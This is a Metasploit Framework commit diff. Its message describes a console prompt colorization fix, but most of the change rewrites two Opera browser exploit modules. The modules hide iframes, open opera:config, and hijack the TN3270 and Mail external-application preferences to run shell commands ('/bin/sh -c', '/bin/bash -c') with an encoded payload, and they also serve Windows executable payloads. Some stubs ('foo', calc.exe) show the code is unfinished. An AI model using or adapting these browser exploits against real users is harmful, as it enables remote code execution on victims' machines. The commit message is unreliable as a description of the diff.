fix a bug in colorization where %c gets replaced before %cya; wouldn't have been a problem until colorization gets put back in
git-svn-id: file:///home/svn/framework3/trunk@6960 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
dac1251cb7
commit
08d50e0a5b
|
@ -231,6 +231,7 @@ protected
|
|||
raise NoCompatiblePayloadError, "Could not locate a compatible payload for #{actual_platform.names.join("/")}/#{actual_arch}"
|
||||
else
|
||||
dlog("Selected payload #{actual_payload.refname} from generic payload #{refname}", 'core', LEV_2)
|
||||
print_status("Selected payload #{actual_payload.refname} from generic payload #{refname}")
|
||||
# Share our datastore with the actual payload so that it has the
|
||||
# appropriate values to substitute ad so on.
|
||||
self.actual_payload.share_datastore(self.datastore)
|
||||
|
|
|
@ -1442,7 +1442,7 @@ class Core
|
|||
mod.init_ui(driver.input, driver.output)
|
||||
|
||||
# Update the command prompt
|
||||
driver.update_prompt("#{mod.type}(#{mod.shortname}) ")
|
||||
driver.update_prompt("%c%cya#{mod.type}%c(%b%red#{mod.shortname}%c) ")
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -1745,7 +1745,7 @@ protected
|
|||
|
||||
def show_options(mod) # :nodoc:
|
||||
mod_opt = Serializer::ReadableText.dump_options(mod, ' ')
|
||||
print("\nModule options:\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)
|
||||
print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)
|
||||
|
||||
# If it's an exploit and a payload is defined, create it and
|
||||
# display the payload's options
|
||||
|
|
|
@ -21,7 +21,7 @@ class Driver < Msf::Ui::Driver
|
|||
ConfigCore = "framework/core"
|
||||
ConfigGroup = "framework/ui/console"
|
||||
|
||||
DefaultPrompt = "%umsf"
|
||||
DefaultPrompt = "%u%whimsf%c"
|
||||
DefaultPromptChar = ">%c"
|
||||
|
||||
#
|
||||
|
|
|
@ -160,12 +160,12 @@ module Shell
|
|||
# Substitute colors
|
||||
new_prompt.gsub!(/%u/, colorize('underline'))
|
||||
new_prompt.gsub!(/%b/, colorize('bold'))
|
||||
new_prompt.gsub!(/%cya/, colorize('cyan'))
|
||||
new_prompt.gsub!(/%c/, colorize('clear'))
|
||||
new_prompt.gsub!(/%red/, colorize('red'))
|
||||
new_prompt.gsub!(/%grn/, colorize('green'))
|
||||
new_prompt.gsub!(/%blu/, colorize('blue'))
|
||||
new_prompt.gsub!(/%yel/, colorize('yellow'))
|
||||
new_prompt.gsub!(/%cya/, colorize('cyan'))
|
||||
new_prompt.gsub!(/%whi/, colorize('white'))
|
||||
new_prompt.gsub!(/%mag/, colorize('magenta'))
|
||||
new_prompt.gsub!(/%blk/, colorize('black'))
|
||||
|
|
|
@ -55,12 +55,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Targets' =>
|
||||
[
|
||||
#[ 'Opera < 9.10 Windows',
|
||||
# {
|
||||
# 'Platform' => 'win',
|
||||
# 'Arch' => ARCH_X86,
|
||||
# }
|
||||
#],
|
||||
[ 'Opera < 9.10 Windows',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
[ 'Opera < 9.10 Unix Cmd',
|
||||
{
|
||||
'Platform' => 'unix',
|
||||
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_request_uri(cli, request)
|
||||
|
||||
case request.uri
|
||||
when /payload$/
|
||||
when /payload/
|
||||
print_status("Generating payload for #{target} #{target.platform}")
|
||||
# Re-generate the payload
|
||||
if ((p = regenerate_payload(cli)) == nil)
|
||||
|
@ -86,12 +86,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
# NOTE: Change this to the new API when commiting to trunk
|
||||
#content = Msf::Util::EXE.to_win32pe(p.encoded)
|
||||
#content = Rex::Text.to_win32pe(p.encoded)
|
||||
content = "foo"
|
||||
content = Msf::Util::EXE.to_win32pe_vbs(p.encoded)
|
||||
print_status("Generated #{content.length} bytes")
|
||||
headers = { 'Content-Type' => 'application/octet-stream' }
|
||||
#headers = { 'Content-Type' => 'application/octet-stream' }
|
||||
headers = { 'Content-Type' => 'text/html' }
|
||||
when get_resource
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
content = "<body><script>"
|
||||
|
@ -113,6 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
p = regenerate_payload(cli).encoded
|
||||
#print_status(p)
|
||||
shellcode = Rex::Text.to_hex(p, "%")
|
||||
shellcode = Rex::Text.to_hex("foo", "%")
|
||||
js = <<ENDJS
|
||||
blank_iframe = document.createElement('iframe');
|
||||
blank_iframe.src = 'about:blank';
|
||||
|
@ -121,25 +120,35 @@ blank_iframe.setAttribute('style', 'display:none');
|
|||
document.body.appendChild(blank_iframe);
|
||||
blank_iframe_window.eval(
|
||||
"config_iframe = document.createElement('iframe');" +
|
||||
"config_iframe.setAttribute('id', 'config_iframe_window');" +
|
||||
"config_iframe.src = 'opera:config';" +
|
||||
"document.body.appendChild(config_iframe);" +
|
||||
"cache_iframe = document.createElement('iframe');" +
|
||||
"cache_iframe.src = 'opera:cache';" +
|
||||
"cache_iframe.onload = function ()" +
|
||||
"{" +
|
||||
" config_iframe_window.eval" +
|
||||
" (\\"" +
|
||||
" old_handler = opera.getPreference('Network','TN3270 App');" +
|
||||
" shellcode = '#{shellcode}';" +
|
||||
" opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
|
||||
" app_link = document.createElement('a');" +
|
||||
" app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
|
||||
" app_link.click();" +
|
||||
" setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
|
||||
" \\");" +
|
||||
"};" +
|
||||
"document.body.appendChild(cache_iframe);" +
|
||||
"config_iframe.setAttribute('id', 'config_window');" +
|
||||
"config_iframe.src = 'opera:config';" +
|
||||
"document.body.appendChild(config_iframe);" +
|
||||
"exe_iframe = document.createElement('img');" +
|
||||
"exe_iframe.src = '#{get_resource}?payload.jpg';" +
|
||||
"exe_iframe.onload = function () {" +
|
||||
" cache_iframe = document.createElement('iframe');" +
|
||||
" cache_iframe.src = 'opera:cache';" +
|
||||
" cache_iframe.onload = function ()" +
|
||||
" {" +
|
||||
" config_window.eval" +
|
||||
" (\\"" +
|
||||
" old_handler = opera.getPreference('Network','TN3270 App');" +
|
||||
" shellcode = '#{shellcode}';" +
|
||||
" opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
|
||||
" app_link = document.createElement('a');" +
|
||||
" app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
|
||||
//" app_link.click();" +
|
||||
" setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
|
||||
" \\");" +
|
||||
" };" +
|
||||
" document.body.appendChild(cache_iframe);" +
|
||||
"};" +
|
||||
"exe_iframe.onerror = function (e) {" +
|
||||
" for (var i in e) {" +
|
||||
" alert(i);" +
|
||||
" }" +
|
||||
"};" +
|
||||
"document.body.appendChild(exe_iframe);" +
|
||||
"");
|
||||
ENDJS
|
||||
|
||||
|
|
|
@ -70,12 +70,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Targets' =>
|
||||
[
|
||||
#[ 'Automatic', { } ],
|
||||
#[ 'Opera < 9.61 Windows',
|
||||
# {
|
||||
# 'Platform' => 'win',
|
||||
# 'Arch' => ARCH_X86,
|
||||
# }
|
||||
#],
|
||||
[ 'Opera < 9.61 Windows',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
[ 'Opera < 9.61 Unix Cmd',
|
||||
{
|
||||
'Platform' => 'unix',
|
||||
|
@ -104,37 +104,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
^
|
||||
|
||||
case request.uri
|
||||
when /#{get_resource}\.exe/
|
||||
p = regenerate_payload(cli)
|
||||
if (p.nil?)
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
content = Msf::Util.to_win32pe(p.encoded)
|
||||
headers['Content-Type'] = 'application/octet-stream'
|
||||
when /[?]jspayload/
|
||||
p = regenerate_payload(cli)
|
||||
if (p.nil?)
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
# We're going to run this through unescape(), so make sure
|
||||
# everything is encoded
|
||||
penc = Rex::Text.to_hex(p.encoded, "%")
|
||||
content =
|
||||
%Q{
|
||||
var s = document.createElement("iframe");
|
||||
|
||||
s.src="opera:config";
|
||||
s.id="config_window";
|
||||
document.body.appendChild(s);
|
||||
config_window.eval(
|
||||
"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
|
||||
"old_app = opera.getPreference('Mail','External Application');" +
|
||||
"old_handler = opera.getPreference('Mail','Handler');" +
|
||||
"opera.setPreference('Mail','External Application',cmd);" +
|
||||
"opera.setPreference('Mail','Handler','2');" +
|
||||
"app_link = document.createElement('a');" +
|
||||
"app_link.setAttribute('href', 'mailto:a@b.com');" +
|
||||
"app_link.click();" +
|
||||
"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
|
||||
"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
|
||||
"");
|
||||
setTimeout(function () {window.location='about:blank'},1);
|
||||
}
|
||||
|
||||
content = generate_cmd(target, p)
|
||||
when /[?]history/
|
||||
js = %Q^
|
||||
window.onload = function() {
|
||||
|
@ -152,12 +136,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Sending #{self.name} to #{cli.peerhost} for request #{request.uri}")
|
||||
|
||||
js = %Q^
|
||||
var wnd = window;
|
||||
while (wnd.parent != wnd) {
|
||||
wnd = wnd.parent;
|
||||
if (window.opera) {
|
||||
var wnd = window;
|
||||
while (wnd.parent != wnd) {
|
||||
wnd = wnd.parent;
|
||||
}
|
||||
url = location.href;
|
||||
wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
|
||||
}
|
||||
url = location.href;
|
||||
wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
|
||||
^
|
||||
content = %Q^
|
||||
#{html_hdr}
|
||||
|
@ -171,11 +157,69 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
content.gsub!(/^\t{4}/, '')
|
||||
content.gsub!(/\t/, ' ')
|
||||
|
||||
send_response_html(cli, content, headers)
|
||||
handler(cli)
|
||||
end
|
||||
|
||||
def generate_cmd(target, payload)
|
||||
if (target.name =~ /Windows/)
|
||||
config_window_js = %Q{
|
||||
var cmd = unescape('cmd.exe /c calc.exe');
|
||||
old_app = opera.getPreference('Mail','External Application');
|
||||
old_handler = opera.getPreference('Mail','Handler');
|
||||
opera.setPreference('Mail','External Application',cmd);
|
||||
opera.setPreference('Mail','Handler','2');
|
||||
app_link = document.createElement('a');
|
||||
app_link.setAttribute('href', 'mailto:a@b.com');
|
||||
app_link.click();
|
||||
setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);
|
||||
setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);
|
||||
}
|
||||
Rex::Text.compress(config_window_js)
|
||||
toplevel_js = %Q{
|
||||
var config_iframe = document.createElement("iframe");
|
||||
config_iframe.src="opera:config";
|
||||
config_iframe.id="config_window";
|
||||
document.body.appendChild(config_iframe);
|
||||
|
||||
chache_iframe = document.createElement("iframe");
|
||||
exe_iframe = document.createElement("script");
|
||||
exe_iframe.src = "#{get_resource + ".exe"}";
|
||||
exe_iframe.onload = function () {
|
||||
config_window.eval("#{config_window_js}");
|
||||
setTimeout(function () {window.location='about:blank'},1);
|
||||
document.body.appendChild(cache_iframe);
|
||||
};
|
||||
document.body.appendChild(exe_iframe);
|
||||
}
|
||||
elsif (target.name =~ /Unix/)
|
||||
# We're going to run this through unescape(), so make sure
|
||||
# everything is encoded, not just chars that are special to html,
|
||||
# ala encode_uri().
|
||||
penc = Rex::Text.to_hex(payload.encoded, "%")
|
||||
content = %Q{
|
||||
var s = document.createElement("iframe");
|
||||
|
||||
s.src="opera:config";
|
||||
s.id="config_window";
|
||||
document.body.appendChild(s);
|
||||
config_window.eval(
|
||||
"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
|
||||
"old_app = opera.getPreference('Mail','External Application');" +
|
||||
"old_handler = opera.getPreference('Mail','Handler');" +
|
||||
"opera.setPreference('Mail','External Application',cmd);" +
|
||||
"opera.setPreference('Mail','Handler','2');" +
|
||||
"app_link = document.createElement('a');" +
|
||||
"app_link.setAttribute('href', 'mailto:a@b.com');" +
|
||||
"app_link.click();" +
|
||||
"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
|
||||
"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
|
||||
"");
|
||||
setTimeout(function () {window.location='about:blank'},1);
|
||||
}
|
||||
return content
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue